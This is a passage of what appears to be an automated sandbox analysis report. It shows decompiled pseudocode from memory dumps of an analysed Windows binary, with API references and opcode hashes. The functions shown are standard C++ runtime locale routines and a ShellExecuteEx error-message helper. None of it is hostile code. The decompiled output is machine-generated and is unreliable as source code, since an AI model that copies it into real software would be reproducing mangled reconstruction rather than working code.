                                                                                                				char _v16;
                                                                                                				signed short _v20;
                                                                                                				char _v24;
                                                                                                				char _v28;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				intOrPtr _v56;
                                                                                                				char _v72;
                                                                                                				signed int _v80;
                                                                                                				char _v124;
                                                                                                				char _v128;
                                                                                                				char _v132;
                                                                                                				signed short _v136;
                                                                                                				signed int _v140;
                                                                                                				signed short _v144;
                                                                                                				signed short _v148;
                                                                                                				signed int _v152;
                                                                                                				char _v160;
                                                                                                				char _v168;
                                                                                                				intOrPtr _v180;
                                                                                                				intOrPtr _v184;
                                                                                                				char _v220;
                                                                                                				char _v272;
                                                                                                				char _v320;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				signed int _t94;
                                                                                                				signed short* _t100;
                                                                                                				signed int _t103;
                                                                                                				signed int _t104;
                                                                                                				signed int _t111;
                                                                                                				signed int _t112;
                                                                                                				signed int _t114;
                                                                                                				void* _t119;
                                                                                                				void* _t144;
                                                                                                				signed short _t152;
                                                                                                				void* _t154;
                                                                                                				intOrPtr _t158;
                                                                                                				signed int _t168;
                                                                                                				void* _t173;
                                                                                                				signed int _t175;
                                                                                                				signed int _t177;
                                                                                                				signed short _t180;
                                                                                                				signed int _t183;
                                                                                                				signed int _t185;
                                                                                                				signed int _t188;
                                                                                                				signed int _t190;
                                                                                                				void* _t191;
                                                                                                				void* _t193;
                                                                                                				void* _t217;
                                                                                                
                                                                                                				_t217 = __fp0;
                                                                                                				_t173 = __edx;
                                                                                                				_t185 = _t190;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6988);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_t191 = _t190 - 0x10;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_t94 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_push(_t94 ^ _t185);
                                                                                                				 *[fs:0x0] =  &_v16;
                                                                                                				E00F856E6( &_v28, 0);
                                                                                                				_v8 = 0;
                                                                                                				_t175 =  *0xfd27b4;
                                                                                                				_t152 =  *0xfd152c; // 0x0
                                                                                                				_v20 = _t152;
                                                                                                				if(_t175 == 0) {
                                                                                                					_v8 = 0;
                                                                                                					E00F8573E( &_v24);
                                                                                                					_t175 =  *0xfd27b4;
                                                                                                				}
                                                                                                				_t10 = _a4 + 4; // 0xffff766f
                                                                                                				_t158 =  *_t10;
                                                                                                				if(_t175 >=  *((intOrPtr*)(_t158 + 0xc))) {
                                                                                                					_t180 = 0;
                                                                                                					__eflags = 0;
                                                                                                					goto L8;
                                                                                                				} else {
                                                                                                					_t180 =  *( *((intOrPtr*)(_t158 + 8)) + _t175 * 4);
                                                                                                					if(_t180 != 0) {
                                                                                                						L16:
                                                                                                						_v8 = 0xffffffff;
                                                                                                						E00F8573E( &_v28);
                                                                                                						 *[fs:0x0] = _v16;
                                                                                                						return _t180;
                                                                                                					} else {
                                                                                                						L8:
                                                                                                						if( *((char*)(_t158 + 0x14)) == 0) {
                                                                                                							L11:
                                                                                                							if(_t180 != 0) {
                                                                                                								goto L16;
                                                                                                							} else {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t144 = E00F8549E();
                                                                                                							if(_t175 >=  *((intOrPtr*)(_t144 + 0xc))) {
                                                                                                								L12:
                                                                                                								if(_t152 == 0) {
                                                                                                									_push(_a4);
                                                                                                									_t100 =  &_v20;
                                                                                                									_push(_t100);
                                                                                                									L18();
                                                                                                									_t193 = _t191 + 8;
                                                                                                									__eflags = _t100 - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										asm("int3");
                                                                                                										_push(_t152);
                                                                                                										_t154 = _t193;
                                                                                                										_push(_t185);
                                                                                                										_v56 =  *((intOrPtr*)(_t154 + 4));
                                                                                                										_t188 = (_t193 - 0x00000008 & 0xfffffff8) + 4;
                                                                                                										_push(0xffffffff);
                                                                                                										_push(0xfb69ff);
                                                                                                										_push( *[fs:0x0]);
                                                                                                										_push(_t154);
                                                                                                										_t103 =  *0xfcf00c; // 0xfd8fa683
                                                                                                										_t104 = _t103 ^ _t188;
                                                                                                										_v80 = _t104;
                                                                                                										_push(_t180);
                                                                                                										_push(_t175);
                                                                                                										_push(_t104);
                                                                                                										 *[fs:0x0] =  &_v72;
                                                                                                										_t177 =  *(_t154 + 8);
                                                                                                										_v180 =  *((intOrPtr*)(_t154 + 0xc));
                                                                                                										_v184 = 0;
                                                                                                										__eflags = _t177;
                                                                                                										if(_t177 != 0) {
                                                                                                											__eflags =  *_t177;
                                                                                                											if( *_t177 == 0) {
                                                                                                												_t183 = LocalAlloc(0x40, 0x18);
                                                                                                												_v152 = _t183;
                                                                                                												_v20 = 0;
                                                                                                												__eflags = _t183;
                                                                                                												if(_t183 == 0) {
                                                                                                													_t183 = 0;
                                                                                                													__eflags = 0;
                                                                                                												} else {
                                                                                                													_t168 =  *(_v136 + 4);
                                                                                                													__eflags = _t168;
                                                                                                													if(_t168 == 0) {
                                                                                                														_t114 = 0xfc76d9;
                                                                                                													} else {
                                                                                                														_t114 =  *(_t168 + 0x18);
                                                                                                														__eflags = _t114;
                                                                                                														if(_t114 == 0) {
                                                                                                															_t114 = _t168 + 0x1c;
                                                                                                														}
                                                                                                													}
                                                                                                													E00F78E20( &_v220, _t183, _t114);
                                                                                                													_v20 = 1;
                                                                                                													_v140 = 1;
                                                                                                													 *_t183 = 0xfb83d0;
                                                                                                													_v20 = 2;
                                                                                                													 *_t183 = 0xfb83e0;
                                                                                                													 *(_t183 + 4) = 0;
                                                                                                													_v20 = 3;
                                                                                                													 *_t183 = 0xfb94ec;
                                                                                                													E00FA1EE6(_t173);
                                                                                                													_t119 = E00F85A28(__eflags,  &_v272);
                                                                                                													_v148 = _t183;
                                                                                                													asm("movups xmm0, [eax]");
                                                                                                													asm("movups [ebp-0x40], xmm0");
                                                                                                													asm("movups xmm0, [eax+0x10]");
                                                                                                													asm("movups [ebp-0x30], xmm0");
                                                                                                													asm("movq xmm0, [eax+0x20]");
                                                                                                													asm("movq [ebp-0x20], xmm0");
                                                                                                													_v40 =  *((intOrPtr*)(_t119 + 0x28));
                                                                                                													 *(_t183 + 8) = 0;
                                                                                                													 *(_t183 + 0x10) = 0;
                                                                                                													 *(_t183 + 0x14) = 0;
                                                                                                													_v20 = 4;
                                                                                                													E00F85A28(__eflags,  &_v320);
                                                                                                													_push( &_v124);
                                                                                                													_push(0);
                                                                                                													 *(_t183 + 8) = E00F7F7A0(0xfc76d9);
                                                                                                													 *(_t183 + 0x10) = E00F7FE50(_t154, _t177, _t183, _t217, "false", 0,  &_v80);
                                                                                                													 *(_t183 + 0x14) = E00F7FE50(_t154, _t177, _t183, _t217, "true", 0,  &_v80);
                                                                                                													_v148 = 0;
                                                                                                													asm("xorps xmm0, xmm0");
                                                                                                													_v128 = 0x2e;
                                                                                                													_v144 = 0;
                                                                                                													asm("movlpd [ebp-0x90], xmm0");
                                                                                                													E00F85AF7( &_v220,  &_v144,  &_v128, 1,  &_v160,  &_v80);
                                                                                                													asm("xorps xmm0, xmm0");
                                                                                                													 *((short*)(_t183 + 0xc)) = _v144 & 0x0000ffff;
                                                                                                													_v132 = 0x2c;
                                                                                                													_v136 = 0;
                                                                                                													asm("movlpd [ebp-0x98], xmm0");
                                                                                                													E00F85AF7( &_v220,  &_v136,  &_v132, 1,  &_v168,  &_v80);
                                                                                                													 *((short*)(_t183 + 0xe)) = _v136 & 0x0000ffff;
                                                                                                													_v20 = 1;
                                                                                                												}
                                                                                                												_v20 = 5;
                                                                                                												 *_t177 = _t183;
                                                                                                												_v20 = 0xffffffff;
                                                                                                												_t111 = _v140;
                                                                                                												__eflags = _t111 & 0x00000001;
                                                                                                												if((_t111 & 0x00000001) != 0) {
                                                                                                													_t112 = _t111 & 0xfffffffe;
                                                                                                													__eflags = _t112;
                                                                                                													_v140 = _t112;
                                                                                                													E00F79300();
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                										 *[fs:0x0] = _v28;
                                                                                                										__eflags = _v36 ^ _t188;
                                                                                                										return E00F80D7F(_v36 ^ _t188, _t173);
                                                                                                									} else {
                                                                                                										_t180 = _v20;
                                                                                                										_a4 = _t180;
                                                                                                										_v8 = 2;
                                                                                                										E00F85472(_t180);
                                                                                                										 *((intOrPtr*)( *_t180 + 4))();
                                                                                                										 *0xfd152c = _t180;
                                                                                                										_a4 = 0;
                                                                                                										_v8 = 0;
                                                                                                										goto L16;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t180 = _t152;
                                                                                                									goto L16;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t180 =  *( *((intOrPtr*)(_t144 + 8)) + _t175 * 4);
                                                                                                								goto L11;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}






















































                                                                                                0x00f7b720
                                                                                                0x00f7b720
                                                                                                0x00f7b721
                                                                                                0x00f7b723
                                                                                                0x00f7b725
                                                                                                0x00f7b730
                                                                                                0x00f7b731
                                                                                                0x00f7b735
                                                                                                0x00f7b736
                                                                                                0x00f7b737
                                                                                                0x00f7b73e
                                                                                                0x00f7b742
                                                                                                0x00f7b74d
                                                                                                0x00f7b752
                                                                                                0x00f7b759
                                                                                                0x00f7b75f
                                                                                                0x00f7b765
                                                                                                0x00f7b76a
                                                                                                0x00f7b791
                                                                                                0x00f7b798
                                                                                                0x00f7b79d
                                                                                                0x00f7b79d
                                                                                                0x00f7b7a6
                                                                                                0x00f7b7a6
                                                                                                0x00f7b7ac
                                                                                                0x00f7b7ba
                                                                                                0x00f7b7ba
                                                                                                0x00000000
                                                                                                0x00f7b7ae
                                                                                                0x00f7b7b1
                                                                                                0x00f7b7b6
                                                                                                0x00f7b81d
                                                                                                0x00f7b81d
                                                                                                0x00f7b827
                                                                                                0x00f7b831
                                                                                                0x00f7b83f
                                                                                                0x00f7b7b8
                                                                                                0x00f7b7bc
                                                                                                0x00f7b7c0
                                                                                                0x00f7b7d2
                                                                                                0x00f7b7d4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7b7c2
                                                                                                0x00f7b7c2
                                                                                                0x00f7b7ca
                                                                                                0x00f7b7d6
                                                                                                0x00f7b7d8
                                                                                                0x00f7b7de
                                                                                                0x00f7b7e1
                                                                                                0x00f7b7e4
                                                                                                0x00f7b7e5
                                                                                                0x00f7b7ea
                                                                                                0x00f7b7ed
                                                                                                0x00f7b7f0
                                                                                                0x00f7b840
                                                                                                0x00f7b845
                                                                                                0x00f7b846
                                                                                                0x00f7b847
                                                                                                0x00f7b848
                                                                                                0x00f7b849
                                                                                                0x00f7b84a
                                                                                                0x00f7b84b
                                                                                                0x00f7b84c
                                                                                                0x00f7b84d
                                                                                                0x00f7b84e
                                                                                                0x00f7b84f
                                                                                                0x00f7b850
                                                                                                0x00f7b851
                                                                                                0x00f7b85c
                                                                                                0x00f7b860
                                                                                                0x00f7b864
                                                                                                0x00f7b866
                                                                                                0x00f7b868
                                                                                                0x00f7b873
                                                                                                0x00f7b874
                                                                                                0x00f7b87b
                                                                                                0x00f7b880
                                                                                                0x00f7b882
                                                                                                0x00f7b885
                                                                                                0x00f7b886
                                                                                                0x00f7b887
                                                                                                0x00f7b88b
                                                                                                0x00f7b894
                                                                                                0x00f7b897
                                                                                                0x00f7b89c
                                                                                                0x00f7b89f
                                                                                                0x00f7b8a1
                                                                                                0x00f7b8a7
                                                                                                0x00f7b8a9
                                                                                                0x00f7b8b9
                                                                                                0x00f7b8bb
                                                                                                0x00f7b8c1
                                                                                                0x00f7b8c8
                                                                                                0x00f7b8ca
                                                                                                0x00f7ba53
                                                                                                0x00f7ba53
                                                                                                0x00f7b8d0
                                                                                                0x00f7b8d3
                                                                                                0x00f7b8d6
                                                                                                0x00f7b8d8
                                                                                                0x00f7b8e6
                                                                                                0x00f7b8da
                                                                                                0x00f7b8da
                                                                                                0x00f7b8dd
                                                                                                0x00f7b8df
                                                                                                0x00f7b8e1
                                                                                                0x00f7b8e1
                                                                                                0x00f7b8df
                                                                                                0x00f7b8f2
                                                                                                0x00f7b8f7
                                                                                                0x00f7b900
                                                                                                0x00f7b903
                                                                                                0x00f7b909
                                                                                                0x00f7b910
                                                                                                0x00f7b916
                                                                                                0x00f7b91d
                                                                                                0x00f7b924
                                                                                                0x00f7b92a
                                                                                                0x00f7b936
                                                                                                0x00f7b93e
                                                                                                0x00f7b944
                                                                                                0x00f7b947
                                                                                                0x00f7b94b
                                                                                                0x00f7b94f
                                                                                                0x00f7b953
                                                                                                0x00f7b958
                                                                                                0x00f7b960
                                                                                                0x00f7b963
                                                                                                0x00f7b96a
                                                                                                0x00f7b971
                                                                                                0x00f7b978
                                                                                                0x00f7b983
                                                                                                0x00f7b98e
                                                                                                0x00f7b98f
                                                                                                0x00f7b99e
                                                                                                0x00f7b9b4
                                                                                                0x00f7b9ca
                                                                                                0x00f7b9d0
                                                                                                0x00f7b9da
                                                                                                0x00f7b9dd
                                                                                                0x00f7b9e1
                                                                                                0x00f7b9ef
                                                                                                0x00f7ba02
                                                                                                0x00f7ba0b
                                                                                                0x00f7ba11
                                                                                                0x00f7ba15
                                                                                                0x00f7ba19
                                                                                                0x00f7ba20
                                                                                                0x00f7ba3d
                                                                                                0x00f7ba49
                                                                                                0x00f7ba4d
                                                                                                0x00f7ba4d
                                                                                                0x00f7ba55
                                                                                                0x00f7ba5c
                                                                                                0x00f7ba5e
                                                                                                0x00f7ba65
                                                                                                0x00f7ba68
                                                                                                0x00f7ba6a
                                                                                                0x00f7ba6c
                                                                                                0x00f7ba6c
                                                                                                0x00f7ba75
                                                                                                0x00f7ba78
                                                                                                0x00f7ba78
                                                                                                0x00f7ba6a
                                                                                                0x00f7b8a9
                                                                                                0x00f7ba85
                                                                                                0x00f7ba92
                                                                                                0x00f7ba9f
                                                                                                0x00f7b7f2
                                                                                                0x00f7b7f2
                                                                                                0x00f7b7f5
                                                                                                0x00f7b7f8
                                                                                                0x00f7b7fd
                                                                                                0x00f7b809
                                                                                                0x00f7b80c
                                                                                                0x00f7b812
                                                                                                0x00f7b819
                                                                                                0x00000000
                                                                                                0x00f7b819
                                                                                                0x00f7b7da
                                                                                                0x00f7b7da
                                                                                                0x00000000
                                                                                                0x00f7b7da
                                                                                                0x00f7b7cc
                                                                                                0x00f7b7cf
                                                                                                0x00000000
                                                                                                0x00f7b7cf
                                                                                                0x00f7b7ca
                                                                                                0x00f7b7c0
                                                                                                0x00f7b7b6

                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B74D
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F7B770
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B798
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F7B7FD
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F7B827
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                • String ID:
                                                                                                • API String ID: 459529453-0
                                                                                                • Opcode ID: 267ac8f61bdc163337ddfc298b8dbfb99273b61c490d71fa6ea780b552b62099
                                                                                                • Instruction ID: 86346decdff2df6323ab18023d479ec92fd755d64877a533ef94a6027ab6ce2d
                                                                                                • Opcode Fuzzy Hash: 267ac8f61bdc163337ddfc298b8dbfb99273b61c490d71fa6ea780b552b62099
                                                                                                • Instruction Fuzzy Hash: 00311431901208DFCB25DF64D950BAEBBB4EB41720F14C15EE809A7392D734AD02EB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00F758E0(void* __ecx, void* __edx) {
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				signed int _t6;
                                                                                                				signed int _t9;
                                                                                                				void* _t12;
                                                                                                				void* _t16;
                                                                                                				void* _t23;
                                                                                                				signed int* _t26;
                                                                                                				long _t27;
                                                                                                
                                                                                                				_t12 = __edx;
                                                                                                				_t23 = __ecx;
                                                                                                				_t27 = GetLastError();
                                                                                                				_t25 =  ==  ? L"false" : L"true";
                                                                                                				_t26 = E00F76CD0(_t12, L"Call to ShellExecuteEx() returned:",  ==  ? L"false" : L"true", 0);
                                                                                                				while( *_t26 != 0) {
                                                                                                					_t26 =  &(_t26[0]);
                                                                                                				}
                                                                                                				_t6 = 0x4c;
                                                                                                				_t16 = L"Last error=" - _t26;
                                                                                                				do {
                                                                                                					 *_t26 = _t6;
                                                                                                					_t26 =  &(_t26[0]);
                                                                                                					_t6 =  *(_t16 + _t26) & 0x0000ffff;
                                                                                                				} while (_t6 != 0);
                                                                                                				 *_t26 = 0;
                                                                                                				E00F76C10(_t27, _t26, _t23, _t26);
                                                                                                				while( *_t26 != 0) {
                                                                                                					_t26 =  &(_t26[0]);
                                                                                                				}
                                                                                                				_t9 = 0xd;
                                                                                                				do {
                                                                                                					 *_t26 = _t9;
                                                                                                					_t26 =  &(_t26[0]);
                                                                                                					_t9 =  *(0xfc75cc + _t26) & 0x0000ffff;
                                                                                                				} while (_t9 != 0);
                                                                                                				 *_t26 = 0;
                                                                                                				return _t26;
                                                                                                			}












                                                                                                0x00f758e4
                                                                                                0x00f758e6
                                                                                                0x00f758ee
                                                                                                0x00f758fc
                                                                                                0x00f7590e
                                                                                                0x00f75917
                                                                                                0x00f75920
                                                                                                0x00f75923
                                                                                                0x00f7592e
                                                                                                0x00f75933
                                                                                                0x00f75935
                                                                                                0x00f75935
                                                                                                0x00f75938
                                                                                                0x00f7593b
                                                                                                0x00f7593f
                                                                                                0x00f7594a
                                                                                                0x00f7594d
                                                                                                0x00f75956
                                                                                                0x00f75960
                                                                                                0x00f75963
                                                                                                0x00f7596e
                                                                                                0x00f75975
                                                                                                0x00f75975
                                                                                                0x00f75978
                                                                                                0x00f7597b
                                                                                                0x00f7597f
                                                                                                0x00f75987
                                                                                                0x00f7598f

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00F756C8), ref: 00F758E8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                • API String ID: 1452528299-1782174991
                                                                                                • Opcode ID: 3a922aad9d05907a04aee6618253c19ac8904bf4355e52bbd5b2633eea82274a
                                                                                                • Instruction ID: 393799f0a4c68514978a862e6199b5191ce9ff7d085c63fcd362b8fddf258a8c
                                                                                                • Opcode Fuzzy Hash: 3a922aad9d05907a04aee6618253c19ac8904bf4355e52bbd5b2633eea82274a
                                                                                                • Instruction Fuzzy Hash: 7011C216B00326C6DB302F2C9801726B2F4EF54B60F29487FE9C8D7391EAA98C819391
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00F8678C(void* __ecx, intOrPtr _a8) {
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t19;
                                                                                                				char* _t21;
                                                                                                				short _t28;
                                                                                                				void* _t29;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t32;
                                                                                                
                                                                                                				_t32 = _a8;
                                                                                                				_t31 = __ecx;
                                                                                                				_t3 = _t31 + 0x2c; // 0x2c
                                                                                                				_t29 = _t3;
                                                                                                				if( *((char*)(__ecx + 0x28)) == 0) {
                                                                                                					_t5 = _t32 + 0x10; // 0x1c4689c0
                                                                                                					_t17 =  *_t5;
                                                                                                				} else {
                                                                                                					_t4 = _t32 + 0xc; // 0xbe0f2947
                                                                                                					_t17 =  *_t4;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t31 + 0x10)) = E00F869EE(_t29, _t31, _t32, _t17, 0, _t29);
                                                                                                				_t19 = 0xfc76d9;
                                                                                                				if( *((char*)(_t32 + 0x2e)) <= 4) {
                                                                                                					_t8 = _t32 + 0x20; // 0x47be0f00
                                                                                                					_t19 =  *_t8;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t31 + 0x14)) = E00F869EE(_t29, _t31, _t32, _t19, 0, _t29);
                                                                                                				_t21 = "-";
                                                                                                				if( *((char*)(_t32 + 0x2f)) <= 4) {
                                                                                                					_t11 = _t32 + 0x24; // 0x205e8d2e
                                                                                                					_t21 =  *_t11;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t31 + 0x18)) = E00F869EE(_t29, _t31, _t32, _t21, 0, _t29);
                                                                                                				_t13 = _t32 + 0x14; // 0x578c085
                                                                                                				 *((short*)(_t31 + 0xc)) = E00F869BD( *( *_t13) & 0x000000ff, 0, _t29);
                                                                                                				_t15 = _t32 + 0x18; // 0x7c7ff883
                                                                                                				_t28 = E00F869BD( *( *_t15) & 0x000000ff, 0, _t29);
                                                                                                				 *((short*)(_t31 + 0xe)) = _t28;
                                                                                                				return _t28;
                                                                                                			}













                                                                                                0x00f86791
                                                                                                0x00f86795
                                                                                                0x00f8679b
                                                                                                0x00f8679b
                                                                                                0x00f8679e
                                                                                                0x00f867a5
                                                                                                0x00f867a5
                                                                                                0x00f867a0
                                                                                                0x00f867a0
                                                                                                0x00f867a0
                                                                                                0x00f867a0
                                                                                                0x00f867b1
                                                                                                0x00f867bb
                                                                                                0x00f867c0
                                                                                                0x00f867c2
                                                                                                0x00f867c2
                                                                                                0x00f867c2
                                                                                                0x00f867ce
                                                                                                0x00f867d8
                                                                                                0x00f867dd
                                                                                                0x00f867df
                                                                                                0x00f867df
                                                                                                0x00f867df
                                                                                                0x00f867eb
                                                                                                0x00f867ee
                                                                                                0x00f867fd
                                                                                                0x00f86801
                                                                                                0x00f8680b
                                                                                                0x00f86813
                                                                                                0x00f8681b

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$Maklocchr
                                                                                                • String ID:
                                                                                                • API String ID: 2020259771-0
                                                                                                • Opcode ID: d267b608fc69244e0e941ea86f323f5e72f0b2a800df9296718dfbf47283795c
                                                                                                • Instruction ID: 6d02d01a87970f8562cdbcedf06c0668e0b9146c3bc86d4e3b7eb491c95943b7
                                                                                                • Opcode Fuzzy Hash: d267b608fc69244e0e941ea86f323f5e72f0b2a800df9296718dfbf47283795c
                                                                                                • Instruction Fuzzy Hash: F6118CB19047847BE720ABA59C82F96B7ECEB08714F040519F285CB681D6B9F85497A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00F82295(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t20;
                                                                                                				void* _t25;
                                                                                                				void* _t26;
                                                                                                				intOrPtr* _t39;
                                                                                                				intOrPtr _t40;
                                                                                                				intOrPtr* _t47;
                                                                                                				void* _t51;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t51 - 0x14, 0);
                                                                                                				_t47 =  *0xfd094c; // 0x0
                                                                                                				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t51 - 0x10)) = _t47;
                                                                                                				_t20 = E00F78A40( *((intOrPtr*)(_t51 + 8)), E00F789D0());
                                                                                                				_t45 = _t20;
                                                                                                				if(_t20 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t51 - 0x14);
                                                                                                					return E00FB388C(_t45);
                                                                                                				} else {
                                                                                                					if(_t47 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t51 + 8)));
                                                                                                						_push(_t51 - 0x10);
                                                                                                						_t25 = E00F828C3(_t45, _t47, __eflags);
                                                                                                						_pop(_t39);
                                                                                                						__eflags = _t25 - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t26 = E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_t40 =  *_t39;
                                                                                                							__eflags = _t40;
                                                                                                							if(_t40 != 0) {
                                                                                                								_push(_t47);
                                                                                                								_t48 = _t40;
                                                                                                								E00F9BD1B( *((intOrPtr*)(_t40 + 8)));
                                                                                                								E00F9BD1B( *((intOrPtr*)(_t40 + 0x10)));
                                                                                                								return E00F9BD1B( *((intOrPtr*)(_t48 + 0x14)));
                                                                                                							} else {
                                                                                                								return _t26;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t45 =  *((intOrPtr*)(_t51 - 0x10));
                                                                                                							 *((intOrPtr*)(_t51 - 0x10)) = _t45;
                                                                                                							 *(_t51 - 4) = 1;
                                                                                                							E00F85472(_t45);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t45 + 4))))();
                                                                                                							 *0xfd094c = _t45;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t45 = _t47;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}










                                                                                                0x00f82295
                                                                                                0x00f8229c
                                                                                                0x00f822a6
                                                                                                0x00f822ab
                                                                                                0x00f822b6
                                                                                                0x00f822ba
                                                                                                0x00f822c6
                                                                                                0x00f822cb
                                                                                                0x00f822cf
                                                                                                0x00f82314
                                                                                                0x00f82317
                                                                                                0x00f82323
                                                                                                0x00f822d1
                                                                                                0x00f822d3
                                                                                                0x00f822d9
                                                                                                0x00f822df
                                                                                                0x00f822e0
                                                                                                0x00f822e6
                                                                                                0x00f822e7
                                                                                                0x00f822ea
                                                                                                0x00f82324
                                                                                                0x00f82329
                                                                                                0x00f8232a
                                                                                                0x00f8232c
                                                                                                0x00f8232e
                                                                                                0x00f8420b
                                                                                                0x00f8420c
                                                                                                0x00f84211
                                                                                                0x00f84219
                                                                                                0x00f8422a
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f822ec
                                                                                                0x00f822ec
                                                                                                0x00f822ef
                                                                                                0x00f822f3
                                                                                                0x00f822f7
                                                                                                0x00f82304
                                                                                                0x00f8230c
                                                                                                0x00f8230e
                                                                                                0x00000000
                                                                                                0x00f8230e
                                                                                                0x00f822d5
                                                                                                0x00f822d5
                                                                                                0x00000000
                                                                                                0x00f822d5
                                                                                                0x00f822d3

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8229C
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F822A6
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • numpunct.LIBCPMT ref: 00F822E0
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F822F7
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F82317
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                • String ID:
                                                                                                • API String ID: 743221004-0
                                                                                                • Opcode ID: 53601ce8b458adeaa993223b186a93facb1d5476e021e5d7829299ab14d68ae4
